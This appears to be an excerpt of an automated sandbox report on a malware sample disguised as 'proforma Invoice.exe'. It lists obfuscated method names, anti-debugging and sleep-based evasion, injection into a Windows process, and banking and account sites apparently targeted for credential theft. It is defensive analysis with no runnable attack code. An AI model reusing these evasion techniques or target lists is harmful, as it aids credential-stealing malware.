                Source: 0.2.proforma Invoice.exe.4961978.1.raw.unpack, DXfa1W5uIxWbCxb1Ub.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'wVmHjLg3Ge', 'NsKHgpBUyb', 'XbCHzRQR9I', 'WMQf0j6lt1', 'N60f1xjqqv', 'fl0fHVudN3', 'Tj6ffdbnI5', 'jgDRaiPb44A6HiBxvox'
                Source: 0.2.proforma Invoice.exe.4961978.1.raw.unpack, MSNvtln2HvvOpQ5QOi.csHigh entropy of concatenated method names: 'X2o1aemaC0', 'Fg11tIJaEF', 'GDF130n04Q', 'kW61dA0QB4', 'zeU1sHvKbX', 'yqf1FbI8jC', 'coXJ8RkSM8WjwEEvwU', 'iyboGoYWLN3PhnWFjO', 'NN211qTedb', 'eHY1fl8u8O'
                Source: 0.2.proforma Invoice.exe.4961978.1.raw.unpack, D54PXOI7OUHMYsywfu.csHigh entropy of concatenated method names: 'AEiaOTsy3W', 'DeDa5B67wX', 'jMuaThsZ2q', 'khlTgcUiM0', 'j6cTzJpgPs', 'juda03nLmP', 'pnIa1KV1F8', 't3oaHnMaWs', 'qdxafqsMXq', 'GydanUkkqA'
                Source: 0.2.proforma Invoice.exe.4961978.1.raw.unpack, hNFWw9wKiPcdCKODJU.csHigh entropy of concatenated method names: 'ToString', 'y1qFLyt8fm', 'gZCFxBDVVH', 'KACFkcLuq0', 'YyWFVo96Z9', 'TBXFy3UVG0', 'Ai2FiGsatn', 'TBWFIn4hoJ', 'oAuFqmo0Xi', 'PUEFldQxjP'
                Source: 0.2.proforma Invoice.exe.4961978.1.raw.unpack, GbX2qfKbI8jCbFncd2.csHigh entropy of concatenated method names: 'KsKTmBg75E', 'pEXTYQPhyB', 'u7RTuQG88E', 'nOqTad15HY', 'fueTtTRf1V', 'XD5uMio0iu', 'NhTuBOCuTa', 'wtLuG0UEnx', 'mPKuUFWbSo', 'zZLujMKrOC'
                Source: 0.2.proforma Invoice.exe.4961978.1.raw.unpack, aQB4p3Qnt1hobNeUHv.csHigh entropy of concatenated method names: 'yc0uXS5Uk4', 'VOvu7XA5le', 'hZM5kyUPVi', 'Wnp5VM7nj9', 'uFO5yaS5ac', 'ihQ5i1y83B', 'c025IbARaU', 'Qmt5q18G9w', 'E7y5lOcxOG', 'MV8543pOy6'
                Source: 0.2.proforma Invoice.exe.4961978.1.raw.unpack, rhU4p9UstIW2S6MCeD.csHigh entropy of concatenated method names: 'XEaJOA7Gi2', 'uWFJYg4aoo', 'fQhJ5BtL1R', 'lS9Juhf0AJ', 'NtNJTpyXoN', 'E95JaRjEcs', 'Ut3JtaBEPq', 'JNvJZadw8i', 'VOeJ3Ih9gg', 'UmLJd9VPmu'
                Source: 0.2.proforma Invoice.exe.4961978.1.raw.unpack, PfYJUvlpfloB23qrsM.csHigh entropy of concatenated method names: 'Q3ba2tyelp', 'FxeaeLBBB5', 'pxcavH3vir', 'RMuaNj0HjX', 'GHraXvUp9E', 'I83aouRgZa', 'PD9a7hDhly', 'IHtaE96JC4', 'mowacToMHK', 'CtHaQfymyJ'
                Source: 0.2.proforma Invoice.exe.4961978.1.raw.unpack, osknQ3jFZRqGkiyOwk.csHigh entropy of concatenated method names: 'UnMJKDRlGZ', 'GddJxjJ3jI', 'VukJkEXC4e', 'htnJVFg1Vd', 'AQDJPCEtsr', 'nBFJy6n7DF', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.proforma Invoice.exe.4961978.1.raw.unpack, FTROZxcDF0n04QtW6A.csHigh entropy of concatenated method names: 'rNm5N4Psil', 'Vra5oSE5AL', 'BmC5ETyTwi', 'WnB5cpSsxZ', 'RXA5sKE9F9', 'EUo5FCkVUQ', 'l6A5hvrlqe', 'AOf5J4Ne7p', 'W0t5AFHhbZ', 'cSJ5SyIK0g'
                Source: 0.2.proforma Invoice.exe.4961978.1.raw.unpack, JpGDeOW2872AOverOI.csHigh entropy of concatenated method names: 'XUPrEAqL41', 'xIbrcTXm6c', 'ls1rKb7YY3', 'Xp9rxDatds', 'fvxrVYB1OO', 'ThwryFrNSt', 'zARrIB0K0B', 'uxarqyWVFQ', 'E83r4mkJqH', 'nOErLPcNIl'
                Source: 0.2.proforma Invoice.exe.4961978.1.raw.unpack, pAdSVAtSJwrJrQ6sVq.csHigh entropy of concatenated method names: 'QBZfmKGQ5Y', 'CSqfOXTxCS', 'p7ufYscNUr', 'cbVf5DHmb9', 'OnsfuxXx8T', 'CwPfT8aKR8', 'toefaJV9id', 'FEQftBxuHo', 'oiUfZ47mHU', 'qndf3EGydp'
                Source: 0.2.proforma Invoice.exe.4961978.1.raw.unpack, dr4Rsf6rNqdXKT47XL.csHigh entropy of concatenated method names: 'QCEh3KOU6l', 'WaChdC211N', 'ToString', 'Y0whOk55Jr', 'lPihYncVNX', 'pM7h5m0F5w', 'mAJhullDxK', 'kq4hTZFnR7', 'JPAhaknbN2', 'NfxhtkBsLS'
                Source: 0.2.proforma Invoice.exe.4961978.1.raw.unpack, UFBfuA1fBvY5mTK4NnR.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'PCkSP9unBa', 'h9gSbBDTiB', 'lAuSwQOkm8', 'uc8S6y3IGc', 'gBFSMAcE60', 'sTWSBfY9bW', 'ME1SGeFmyO'
                Source: C:\Users\user\Desktop\proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Switches to a custom stack to bypass stack traces
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeAPI/Special instruction interceptor: Address: 7FF8C88ED7E4
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
                Source: C:\Users\user\Desktop\proforma Invoice.exeMemory allocated: 1430000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\proforma Invoice.exeMemory allocated: 2ED0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\proforma Invoice.exeMemory allocated: 2C50000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\proforma Invoice.exeMemory allocated: 7EE0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\proforma Invoice.exeMemory allocated: 8EE0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\proforma Invoice.exeMemory allocated: 90A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\proforma Invoice.exeMemory allocated: A0A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\proforma Invoice.exeMemory allocated: A410000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\proforma Invoice.exeMemory allocated: B410000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\proforma Invoice.exeMemory allocated: C410000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011A096E rdtsc 3_2_011A096E
                Source: C:\Users\user\Desktop\proforma Invoice.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeWindow / User API: threadDelayed 1356Jump to behavior
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeWindow / User API: threadDelayed 8616Jump to behavior
                Source: C:\Users\user\Desktop\proforma Invoice.exeAPI coverage: 1.1 %
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeAPI coverage: 2.8 %
                Source: C:\Users\user\Desktop\proforma Invoice.exe TID: 5052Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe TID: 4256Thread sleep count: 1356 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe TID: 4256Thread sleep time: -2712000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe TID: 4256Thread sleep count: 8616 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe TID: 4256Thread sleep time: -17232000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe TID: 1628Thread sleep time: -50000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe TID: 1628Thread sleep time: -45000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe TID: 1628Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_006FC270 FindFirstFileW,FindNextFileW,FindClose,6_2_006FC270
                Source: C:\Users\user\Desktop\proforma Invoice.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: s002-5p.6.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: s002-5p.6.drBinary or memory string: discord.comVMware20,11696428655f
                Source: s002-5p.6.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: s002-5p.6.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: s002-5p.6.drBinary or memory string: global block list test formVMware20,11696428655
                Source: s002-5p.6.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: s002-5p.6.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: s002-5p.6.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: s002-5p.6.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: s002-5p.6.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: s002-5p.6.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: s002-5p.6.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: s002-5p.6.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: s002-5p.6.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                Source: s002-5p.6.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: EhStorAuthn.exe, 00000006.00000002.4497404276.000000000082A000.00000004.00000020.00020000.00000000.sdmp, kYuxUXtJmKaZ.exe, 00000008.00000002.4497739352.0000000000F5F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000009.00000002.2772504389.000001E68313C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: s002-5p.6.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: s002-5p.6.drBinary or memory string: outlook.office.comVMware20,11696428655s
                Source: s002-5p.6.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: s002-5p.6.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: s002-5p.6.drBinary or memory string: AMC password management pageVMware20,11696428655
                Source: s002-5p.6.drBinary or memory string: tasks.office.comVMware20,11696428655o
                Source: s002-5p.6.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: s002-5p.6.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: s002-5p.6.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                Source: s002-5p.6.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: s002-5p.6.drBinary or memory string: dev.azure.comVMware20,11696428655j
                Source: s002-5p.6.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: s002-5p.6.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: s002-5p.6.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                Source: s002-5p.6.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: s002-5p.6.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: C:\Users\user\Desktop\proforma Invoice.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\proforma Invoice.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011A096E rdtsc 3_2_011A096E
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_004177F3 LdrLoadDll,3_2_004177F3
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01220115 mov eax, dword ptr fs:[00000030h]3_2_01220115
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0120A118 mov ecx, dword ptr fs:[00000030h]3_2_0120A118
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0120A118 mov eax, dword ptr fs:[00000030h]3_2_0120A118
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0120A118 mov eax, dword ptr fs:[00000030h]3_2_0120A118
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0120A118 mov eax, dword ptr fs:[00000030h]3_2_0120A118
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01190124 mov eax, dword ptr fs:[00000030h]3_2_01190124
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01166154 mov eax, dword ptr fs:[00000030h]3_2_01166154
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01166154 mov eax, dword ptr fs:[00000030h]3_2_01166154
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0115C156 mov eax, dword ptr fs:[00000030h]3_2_0115C156
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011F8158 mov eax, dword ptr fs:[00000030h]3_2_011F8158
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011F4144 mov eax, dword ptr fs:[00000030h]3_2_011F4144
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011F4144 mov eax, dword ptr fs:[00000030h]3_2_011F4144
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011F4144 mov ecx, dword ptr fs:[00000030h]3_2_011F4144
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011F4144 mov eax, dword ptr fs:[00000030h]3_2_011F4144
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011F4144 mov eax, dword ptr fs:[00000030h]3_2_011F4144
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011E019F mov eax, dword ptr fs:[00000030h]3_2_011E019F
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011E019F mov eax, dword ptr fs:[00000030h]3_2_011E019F
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011E019F mov eax, dword ptr fs:[00000030h]3_2_011E019F
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011E019F mov eax, dword ptr fs:[00000030h]3_2_011E019F
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0115A197 mov eax, dword ptr fs:[00000030h]3_2_0115A197
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0115A197 mov eax, dword ptr fs:[00000030h]3_2_0115A197
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0115A197 mov eax, dword ptr fs:[00000030h]3_2_0115A197
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011A0185 mov eax, dword ptr fs:[00000030h]3_2_011A0185
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01204180 mov eax, dword ptr fs:[00000030h]3_2_01204180
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01204180 mov eax, dword ptr fs:[00000030h]3_2_01204180
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0121C188 mov eax, dword ptr fs:[00000030h]3_2_0121C188
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0121C188 mov eax, dword ptr fs:[00000030h]3_2_0121C188
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_012361E5 mov eax, dword ptr fs:[00000030h]3_2_012361E5
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011DE1D0 mov eax, dword ptr fs:[00000030h]3_2_011DE1D0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011DE1D0 mov eax, dword ptr fs:[00000030h]3_2_011DE1D0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011DE1D0 mov ecx, dword ptr fs:[00000030h]3_2_011DE1D0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011DE1D0 mov eax, dword ptr fs:[00000030h]3_2_011DE1D0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011DE1D0 mov eax, dword ptr fs:[00000030h]3_2_011DE1D0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_012261C3 mov eax, dword ptr fs:[00000030h]3_2_012261C3
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_012261C3 mov eax, dword ptr fs:[00000030h]3_2_012261C3
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011901F8 mov eax, dword ptr fs:[00000030h]3_2_011901F8
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0117E016 mov eax, dword ptr fs:[00000030h]3_2_0117E016
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0117E016 mov eax, dword ptr fs:[00000030h]3_2_0117E016
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0117E016 mov eax, dword ptr fs:[00000030h]3_2_0117E016
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0117E016 mov eax, dword ptr fs:[00000030h]3_2_0117E016
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011E4000 mov ecx, dword ptr fs:[00000030h]3_2_011E4000
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01202000 mov eax, dword ptr fs:[00000030h]3_2_01202000
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01202000 mov eax, dword ptr fs:[00000030h]3_2_01202000
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01202000 mov eax, dword ptr fs:[00000030h]3_2_01202000
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01202000 mov eax, dword ptr fs:[00000030h]3_2_01202000
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01202000 mov eax, dword ptr fs:[00000030h]3_2_01202000
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01202000 mov eax, dword ptr fs:[00000030h]3_2_01202000
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01202000 mov eax, dword ptr fs:[00000030h]3_2_01202000
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01202000 mov eax, dword ptr fs:[00000030h]3_2_01202000
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011F6030 mov eax, dword ptr fs:[00000030h]3_2_011F6030
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0115A020 mov eax, dword ptr fs:[00000030h]3_2_0115A020
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0115C020 mov eax, dword ptr fs:[00000030h]3_2_0115C020
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01162050 mov eax, dword ptr fs:[00000030h]3_2_01162050
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011E6050 mov eax, dword ptr fs:[00000030h]3_2_011E6050
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0118C073 mov eax, dword ptr fs:[00000030h]3_2_0118C073
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_012260B8 mov eax, dword ptr fs:[00000030h]3_2_012260B8
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_012260B8 mov ecx, dword ptr fs:[00000030h]3_2_012260B8
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0116208A mov eax, dword ptr fs:[00000030h]3_2_0116208A
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011F80A8 mov eax, dword ptr fs:[00000030h]3_2_011F80A8
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011E20DE mov eax, dword ptr fs:[00000030h]3_2_011E20DE
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0115C0F0 mov eax, dword ptr fs:[00000030h]3_2_0115C0F0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011A20F0 mov ecx, dword ptr fs:[00000030h]3_2_011A20F0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0115A0E3 mov ecx, dword ptr fs:[00000030h]3_2_0115A0E3
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011E60E0 mov eax, dword ptr fs:[00000030h]3_2_011E60E0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011680E9 mov eax, dword ptr fs:[00000030h]3_2_011680E9
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0115C310 mov ecx, dword ptr fs:[00000030h]3_2_0115C310
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_01180310 mov ecx, dword ptr fs:[00000030h]3_2_01180310
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0119A30B mov eax, dword ptr fs:[00000030h]3_2_0119A30B
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0119A30B mov eax, dword ptr fs:[00000030h]3_2_0119A30B
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0119A30B mov eax, dword ptr fs:[00000030h]3_2_0119A30B
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011E035C mov eax, dword ptr fs:[00000030h]3_2_011E035C
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011E035C mov eax, dword ptr fs:[00000030h]3_2_011E035C
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011E035C mov eax, dword ptr fs:[00000030h]3_2_011E035C
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011E035C mov ecx, dword ptr fs:[00000030h]3_2_011E035C
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011E035C mov eax, dword ptr fs:[00000030h]3_2_011E035C
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011E035C mov eax, dword ptr fs:[00000030h]3_2_011E035C
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011E2349 mov eax, dword ptr fs:[00000030h]3_2_011E2349
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011E2349 mov eax, dword ptr fs:[00000030h]3_2_011E2349
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011E2349 mov eax, dword ptr fs:[00000030h]3_2_011E2349
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011E2349 mov eax, dword ptr fs:[00000030h]3_2_011E2349
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011E2349 mov eax, dword ptr fs:[00000030h]3_2_011E2349
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011E2349 mov eax, dword ptr fs:[00000030h]3_2_011E2349
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011E2349 mov eax, dword ptr fs:[00000030h]3_2_011E2349
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011E2349 mov eax, dword ptr fs:[00000030h]3_2_011E2349
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011E2349 mov eax, dword ptr fs:[00000030h]3_2_011E2349
